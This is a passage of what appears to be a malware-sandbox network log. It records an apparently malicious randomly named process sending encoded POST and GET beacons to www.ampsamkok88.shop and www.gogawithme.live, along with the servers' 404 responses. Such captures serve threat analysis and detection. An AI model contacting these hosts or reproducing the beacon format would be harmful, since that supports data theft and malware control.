                                                                                                                    Nov 21, 2024 16:59:04.306282997 CET265INData Raw: d8 bd 80 b9 d9 cc 49 36 23 0b 70 70 e5 12 ec fe e8 fe f4 48 51 80 64 c3 9c 0b e6 10 37 68 07 c9 7f 51 98 5b 96 3c 75 0e 72 95 f1 9a f1 be df 27 4f 35 59 40 dd 67 0e 3c cb 6d d4 0b 88 b7 e6 cc e6 f5 ca d8 8d 00 af 50 a6 f6 5b 84 49 62 94 58 5a c0
                                                                                                                    Data Ascii: I6#ppHQd7hQ[<ur'O5Y@g<mP[IbXZUE=h(@GX*yDYq.D8<RUIBeOf4j:n7ali'Xm1DwhJ*YJDfe2:wN(teY}qONO


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    30192.168.2.449972172.67.209.48803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:59:05.749228001 CET636OUTPOST /huvt/ HTTP/1.1
                                                                                                                    Host: www.ampsamkok88.shop
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.ampsamkok88.shop
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.ampsamkok88.shop/huvt/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 2f 7a 2f 30 37 79 78 66 44 6a 58 32 34 2b 4d 69 53 36 2b 76 34 44 2b 73 67 54 6f 6b 33 47 30 2b 50 36 70 57 62 6b 55 6e 74 6c 69 63 79 39 46 6a 48 54 72 39 32 4b 35 4b 79 35 4b 37 54 63 44 62 53 78 63 38 64 58 39 39 68 77 4c 5a 63 64 4a 39 37 76 4e 70 59 56 6a 54 64 75 6c 75 6b 4c 4a 49 71 2f 41 73 77 49 75 72 6c 65 4f 71 4c 4c 78 63 57 66 33 7a 54 4e 4f 56 70 33 6b 69 2f 38 73 72 6b 59 71 43 4c 54 62 38 64 4f 44 48 59 4f 6c 56 58 62 74 73 6a 46 34 6a 4c 51 7a 41 77 34 73 58 68 74 79 2f 42 56 66 48 59 74 35 35 62 54 70 66 59 58 51 33 6a 76 6d 47 6a 54 72 2b 59 4c 77 4e 2b 52 62 68 4c 34 51 6a 50 37 45 76 2b 31 6d 53 56 42 46 36 6e 34 59 3d
                                                                                                                    Data Ascii: GzeXFT7=/z/07yxfDjX24+MiS6+v4D+sgTok3G0+P6pWbkUntlicy9FjHTr92K5Ky5K7TcDbSxc8dX99hwLZcdJ97vNpYVjTdulukLJIq/AswIurleOqLLxcWf3zTNOVp3ki/8srkYqCLTb8dODHYOlVXbtsjF4jLQzAw4sXhty/BVfHYt55bTpfYXQ3jvmGjTr+YLwN+RbhL4QjP7Ev+1mSVBF6n4Y=
                                                                                                                    Nov 21, 2024 16:59:07.022835970 CET1236INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 21 Nov 2024 15:59:06 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bz5lz5U%2BoHfGefslxCrwUDyM6aOLgY2LAdFLIttB0d1iU6pvuSri3BxlIat0HnNednHqpUa%2BQ6%2FhCRXpejeo8E%2BFUo6Kcl3mq17PkuWjvKdAof%2B02Xclh8a3q0P7D4agP01RHz6SKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8e61e292eb705e5f-EWR
                                                                                                                    Content-Encoding: gzip
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1670&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=636&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 32 62 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 6b 6b db 30 14 fd 9e 5f a1 86 52 c9 90 5a 49 69 f7 a8 1f d0 25 29 2b 24 69 d9 52 c6 18 a3 c8 d2 75 ac e2 48 9e a4 24 64 89 ff fb b0 9d a6 59 a1 1d fb 60 90 74 cf b9 e7 de ab 63 85 47 83 db fe f4 fb dd 10 7d 9e 8e 47 e8 ee fe d3 e8 a6 8f da a7 94 de 0c a7 d7 94 0e a6 83 26 72 e6 77 29 1d 4e da 71 2b cc dc 3c 8f c3 0c 98 88 5b a1 93 2e 87 f8 bc 7b 8e 26 da a1 6b bd 50 22 a4 cd 61 2b a4 35 28 4c b4 58 57 bc 5e 7c 80 c9 7a 71 2b 2c e2 69 06 c8 c0 af 05 58 07 02 dd 7f 19 a1 15 b3 48 69 87 d2 0a 87 b4 42 2e 93 16 59 30 4b 30 7e 48 8b 9a 76 25 84 74 52 2b 96 e7 eb 0e 62 e8 af 02 5a 60 8c 36 75 22 50 5c 2f 94 03 03 02 ad 32 99 03 72 66 2d d5 0c 39 8d 16 16 10 53 68 58 81 07 9a 2f e6 a0 5c 75 9e 31 25 2a e0 73 65 3b 59 cb 8d 2c 5c 4c d2 85 e2 95 38 f1 36 4f 4b c4 89 b7 59 32 83 92 88 f9 5c 2b 07 ca 3d e5 dc 6e f7 47 df a4 12 7a e5 8b 5d 24 90 29 49 1a 9e 88 12 9f 1b 60 0e 86 39 54 31 82 1b 39 ec 05 c2 97 4a 81 a9 ee 21 6a af 9a 14 0f 0f fd eb 63 be 3c 2e 98 [TRUNCATED]
                                                                                                                    Data Ascii: 2b2Tkk0_RZIi%)+$iRuH$dY`tcG}G&rw)Nq+<[.{&kP"a+5(LXW^|zq+,iXHiB.Y0K0~Hv%tR+bZ`6u"P\/2rf-9ShX/\u1%*se;Y,\L86OKY2\+=nGz]$)I`9T19J!jc<.asm%zpHq]?&xpU}.JEO|S.)I3fpZiC:gR
                                                                                                                    Nov 21, 2024 16:59:07.023016930 CET269INData Raw: 07 7b 8d 19 b8 9d 80 fd b4 9e b2 d9 84 cd 81 e0 ca 25 d8 fb d1 fd e9 b3 a2 00 25 fa 99 cc 05 61 5e d0 0e 92 ff a2 08 af 2c 65 4a f6 72 95 f1 9a f1 be de a7 4c 0d 9b 43 dd 67 06 72 96 b9 a8 17 30 7f 25 85 cb ea 95 75 eb 1c fc 42 db da 6f 11 66 89
                                                                                                                    Data Ascii: {%%a^,eJrLCgr0%uBof.~C6LV2tgRPC~9k&L: dJv&aBHZ<4 p7VDy?@F{`m$^NN[eYzONH


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    31192.168.2.449978172.67.209.48803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:59:08.417982101 CET10718OUTPOST /huvt/ HTTP/1.1
                                                                                                                    Host: www.ampsamkok88.shop
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.ampsamkok88.shop
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.ampsamkok88.shop/huvt/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 2f 7a 2f 30 37 79 78 66 44 6a 58 32 34 2b 4d 69 53 36 2b 76 34 44 2b 73 67 54 6f 6b 33 47 30 2b 50 36 70 57 62 6b 55 6e 74 6c 71 63 79 50 39 6a 42 7a 58 39 31 4b 35 4b 7a 35 4b 2b 54 63 44 4b 53 78 45 34 64 58 42 48 68 79 7a 5a 54 59 46 39 2b 62 68 70 57 6c 6a 54 41 2b 6c 76 35 62 4a 6e 71 2f 77 57 77 49 2b 72 6c 65 4f 71 4c 4e 56 63 43 65 33 7a 56 4e 4f 57 75 33 6b 75 31 63 74 32 6b 65 44 2f 4c 54 66 57 63 2b 6a 48 57 4b 42 56 53 6f 46 73 2f 56 34 62 4f 51 7a 69 77 34 77 79 68 74 76 41 42 51 4c 74 59 71 52 35 5a 53 55 2b 4b 33 4d 47 68 66 32 6c 30 52 6a 68 56 39 77 61 34 7a 4c 74 50 4b 4a 32 61 5a 77 4d 35 31 36 5a 45 45 4a 70 6c 4e 43 6d 62 72 38 45 33 35 76 6a 30 50 33 52 53 34 64 46 6b 46 63 48 4a 31 56 69 46 54 4a 4d 32 6a 36 69 33 71 34 64 73 56 47 4d 78 69 37 45 62 65 56 4f 37 43 51 70 43 6e 38 35 48 58 78 58 63 5a 47 49 43 61 64 46 75 68 30 37 36 4c 74 65 72 7a 74 66 56 62 69 2b 67 62 4b 4b 57 69 63 50 53 76 58 48 7a 37 44 46 62 4e 47 73 2b 35 44 51 55 68 49 64 79 6b [TRUNCATED]
                                                                                                                    Data Ascii: GzeXFT7=/z/07yxfDjX24+MiS6+v4D+sgTok3G0+P6pWbkUntlqcyP9jBzX91K5Kz5K+TcDKSxE4dXBHhyzZTYF9+bhpWljTA+lv5bJnq/wWwI+rleOqLNVcCe3zVNOWu3ku1ct2keD/LTfWc+jHWKBVSoFs/V4bOQziw4wyhtvABQLtYqR5ZSU+K3MGhf2l0RjhV9wa4zLtPKJ2aZwM516ZEEJplNCmbr8E35vj0P3RS4dFkFcHJ1ViFTJM2j6i3q4dsVGMxi7EbeVO7CQpCn85HXxXcZGICadFuh076LterztfVbi+gbKKWicPSvXHz7DFbNGs+5DQUhIdykPbmmvuzjzkVqZYN8twyReJqmrTGjt72lMFK4wGBBS3qwwlfitZ7pCi54A+6+fGjAy8BTrkPptqOPJ9U1h1HfFzK803K3VWmRg2yADRA6p8wNymzFPwPCwCYjTm2IEqSa9NsKj5XSw/yAy0Hfpu74Ls3v+FP5VQ0VOT6LTRnCaQz19nEM/Kmx/U5qILr8f0ay4AfLyXJ7aBzheb1BT4H/xdPsY3tYUFwuKNzftfScqRkthi0oRD0sWUvKMAHeozUDgTYFHK4ujf+e3vuBktqVpNWEkeeAQuxC2m1pH3jadERYqvwXDFUan8iVl6VlCssjuxcjBhSacSdntKedEjs41+EpmdCphrdF6aa35lGkI5LmsfqEQgVjvrTRjCUWV//TyEI9tTnx1mq6LOLPHwjYjn1G0CtDNJVkZGdCc0hpxk8Z5y4Xda+Qm9kKEMllVJk8rIaPkMVPlfO7iZEkn3duWJZPEZFkcHiUvu08j4bgi7YGhDpbdG0TkELLjO9o02ldmbXAx9CvXzqDxVO3eHs50d1dKdhuPD7bzR+h7BMPwUOxwU4dj3MQ5IHZRipf7V+cz73yC1wkFfx2kQIo1BTS/880wTPcf//3F7195TdTZQYyvMucVpGQihXJQY7HRTe2KLxpCQwmxQUh0DiwHeiS8/D/ReAJfwJDXS [TRUNCATED]
                                                                                                                    Nov 21, 2024 16:59:09.653691053 CET1236INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 21 Nov 2024 15:59:09 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XxhgxXdp4cd95LWHELAj%2BAfICjzUb8CALoysjzZQc30nW3KH0KnPZcCdjFo8IyMD56Ac8glJ%2Fm%2F%2BtfDy8SqIMKYuqo%2Fs6yQqy7lO35tgxulIdiu0fofhdcrxfxXiAUwjZNUFQLDsRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8e61e2a38fc580e0-EWR
                                                                                                                    Content-Encoding: gzip
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1601&sent=3&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10718&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 32 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 ef 6b db 30 10 fd 9e bf 42 0b a5 92 21 b5 92 ae 1b a5 fe 01 6d 92 b2 42 92 96 35 65 8c 31 8a 2c 9d 63 15 47 f2 24 25 21 4b fc bf 0f db 69 9a 15 da b1 0f 06 49 f7 de bd bb d3 b3 c2 0f 83 db fe f4 fb dd 10 7d 99 8e 47 e8 ee e1 6a 74 d3 47 ed 13 4a 6f 86 d3 6b 4a 07 d3 41 13 39 f5 bb 94 0e 27 ed b8 15 66 6e 9e c7 61 06 4c c4 ad d0 49 97 43 7c d6 3d 43 13 ed d0 b5 5e 28 11 d2 e6 b0 15 d2 1a 14 26 5a ac 2b 5e 2f 3e c0 64 bd b8 15 16 f1 34 03 64 e0 d7 02 ac 03 81 1e be 8e d0 8a 59 a4 b4 43 69 85 43 5a 21 97 49 8b 2c 98 25 18 3f a4 45 4d bb 14 42 3a a9 15 cb f3 75 07 31 f4 57 01 2d 30 46 9b 3a 11 28 ae 17 ca 81 01 81 56 99 cc 01 39 b3 96 6a 86 9c 46 0b 0b 88 29 34 ac c0 03 cd 17 73 50 ae 3a cf 98 12 15 f0 a5 b2 9d ac e5 46 16 2e 26 e9 42 f1 4a 9c 78 9b e7 25 e2 c4 db 2c 99 41 49 c4 7c ae 95 03 e5 9e 73 6e b7 fb a3 6f 52 09 bd f2 c5 2e 12 c8 94 24 0d 4f 44 89 cf 0d 30 07 c3 1c aa 18 c1 8d 1c f6 02 e1 4b a5 c0 54 f7 10 b5 57 4d 8a c7 c7 fe f5 11 5f 1e 15 cc [TRUNCATED]
                                                                                                                    Data Ascii: 2a7Tk0B!mB5e1,cG$%!KiI}GjtGJokJA9'fnaLIC|=C^(&Z+^/>d4dYCiCZ!I,%?EMB:u1W-0F:(V9jF)4sP:F.&BJx%,AI|snoR.$OD0KTWM_6)t.<dg"\,kySJ+\>g,AKft
                                                                                                                    Nov 21, 2024 16:59:09.653721094 CET275INData Raw: 2c 0e f6 1a 33 70 3b 01 7b b5 9e b2 d9 84 cd 81 e0 ca 25 d8 fb d1 fd e9 b3 a2 00 25 fa 99 cc 05 61 5e d0 0e 92 ff a2 08 af 2c 65 4a f6 72 95 f1 9a f1 be dd a7 4c 0d 9b 43 dd 67 06 72 96 b9 a8 17 30 7f 25 85 cb ea 95 75 eb 1c fc 42 db da 6f 11 66
                                                                                                                    Data Ascii: ,3p;{%%a^,eJrLCgr0%uBof.~C6LV2tgRPC~=k&K3X; dJv&aBHZ<4 p7VDy?AF{`m$^{eYzONH


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    32192.168.2.449984172.67.209.48803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:59:11.084120035 CET350OUTGET /huvt/?aJZ=OnOxa0A0n0BXj0&GzeXFT7=yxXU4HpAbhaf+Ok3Aej6zxGwiCQCqWNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPbkXZZc5h44QYxsw3x5GAutS7NMZYCP3hSt0= HTTP/1.1
                                                                                                                    Host: www.ampsamkok88.shop
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Nov 21, 2024 16:59:12.266387939 CET1236INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 21 Nov 2024 15:59:12 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CAbyanZzW%2Ft3Z7dGXO6uSFuv6sk238JP421QxdPAycmJ%2BC3Yo3H9Lo5z%2B6FiM0%2BbYfdkC4i2o5RlAX11GyFERjqY0%2FteMyiQjTs72Qw7zUTJLLYoNV78aBlDpMc2ultytAsSwfxAXg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8e61e2b40e1a41ad-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1689&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=350&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 34 65 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b [TRUNCATED]
                                                                                                                    Data Ascii: 4e5<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$param
                                                                                                                    Nov 21, 2024 16:59:12.266443968 CET806INData Raw: 73 3d 7b 72 3a 27 38 65 36 31 65 32 62 34 30 65 31 61 34 31 61 64 27 2c 74 3a 27 4d 54 63 7a 4d 6a 49 77 4e 44 63 31 4d 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74
                                                                                                                    Data Ascii: s={r:'8e61e2b40e1a41ad',t:'MTczMjIwNDc1Mi4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('h


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    33192.168.2.450000209.74.77.109803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:59:17.744138956 CET613OUTPOST /6gtt/ HTTP/1.1
                                                                                                                    Host: www.gogawithme.live
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.gogawithme.live
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.gogawithme.live/6gtt/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 66 45 6f 55 73 33 78 62 74 43 48 52 50 62 42 64 6a 61 53 4a 71 34 69 54 73 52 72 7a 50 2f 66 6b 4c 5a 75 73 58 75 6e 2b 56 6d 72 76 32 4c 58 6f 66 47 79 46 59 2b 65 69 73 53 4a 39 37 65 5a 51 32 61 75 6f 55 62 79 63 6c 4f 36 41 46 75 4d 6a 38 6f 72 76 64 39 44 56 59 69 33 64 76 64 56 35 45 6e 6a 76 2f 6e 72 6d 4b 58 61 64 41 50 4e 4a 31 6b 34 4c 37 36 47 4a 30 6d 52 4e 52 42 30 39 66 62 54 53 48 4e 55 2f 67 44 64 57 68 76 58 79 6f 41 31 45 5a 71 4b 6a 38 56 36 42 6f 73 44 55 57 43 6d 69 37 31 4e 68 4e 52 57 31 35 6f 6a 4a 62 77 45 4a 33 57 63 64 38 52 6e 31 77 43 36 61 39 67 3d 3d
                                                                                                                    Data Ascii: GzeXFT7=fEoUs3xbtCHRPbBdjaSJq4iTsRrzP/fkLZusXun+Vmrv2LXofGyFY+eisSJ97eZQ2auoUbyclO6AFuMj8orvd9DVYi3dvdV5Enjv/nrmKXadAPNJ1k4L76GJ0mRNRB09fbTSHNU/gDdWhvXyoA1EZqKj8V6BosDUWCmi71NhNRW15ojJbwEJ3Wcd8Rn1wC6a9g==
                                                                                                                    Nov 21, 2024 16:59:18.995616913 CET533INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 21 Nov 2024 15:59:18 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    34192.168.2.450006209.74.77.109803192C:\Program Files (x86)\evLZhTKsSoJaTeHwunreBLQaAdAFHannUBEkMPXIArxtpoioKKpnXKStzIBMzS\iEbayRsPzr.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 21, 2024 16:59:20.414917946 CET633OUTPOST /6gtt/ HTTP/1.1
                                                                                                                    Host: www.gogawithme.live
                                                                                                                    Accept: */*
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Origin: http://www.gogawithme.live
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Referer: http://www.gogawithme.live/6gtt/
                                                                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                    Data Raw: 47 7a 65 58 46 54 37 3d 66 45 6f 55 73 33 78 62 74 43 48 52 4f 37 52 64 6d 39 4f 4a 74 59 69 53 69 78 72 7a 64 2f 66 6f 4c 5a 69 73 58 76 54 75 4a 41 54 76 33 75 37 6f 65 46 71 46 66 2b 65 69 6e 79 4a 38 31 2b 5a 68 32 61 6a 43 55 61 4f 63 6c 50 61 41 46 75 63 6a 2f 62 44 73 50 64 44 58 54 43 33 54 79 4e 56 35 45 6e 6a 76 2f 6e 4f 37 4b 58 43 64 41 66 39 4a 76 41 4d 49 32 61 47 4b 38 47 52 4e 56 42 30 35 66 62 54 38 48 4f 51 56 67 47 42 57 68 73 44 79 6f 52 31 44 51 71 4b 6c 68 46 37 4f 75 63 32 4d 5a 41 76 31 31 6e 52 6d 4e 54 57 73 34 75 75 54 4b 42 6c 65 6c 57 34 75 68 57 75 42 39 42 48 54 6d 70 76 62 41 44 56 68 68 51 38 59 6a 69 30 55 43 7a 55 6b 47 75 51 3d
                                                                                                                    Data Ascii: GzeXFT7=fEoUs3xbtCHRO7Rdm9OJtYiSixrzd/foLZisXvTuJATv3u7oeFqFf+einyJ81+Zh2ajCUaOclPaAFucj/bDsPdDXTC3TyNV5Enjv/nO7KXCdAf9JvAMI2aGK8GRNVB05fbT8HOQVgGBWhsDyoR1DQqKlhF7Ouc2MZAv11nRmNTWs4uuTKBlelW4uhWuB9BHTmpvbADVhhQ8Yji0UCzUkGuQ=
                                                                                                                    Nov 21, 2024 16:59:21.667368889 CET533INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 21 Nov 2024 15:59:21 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 389
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
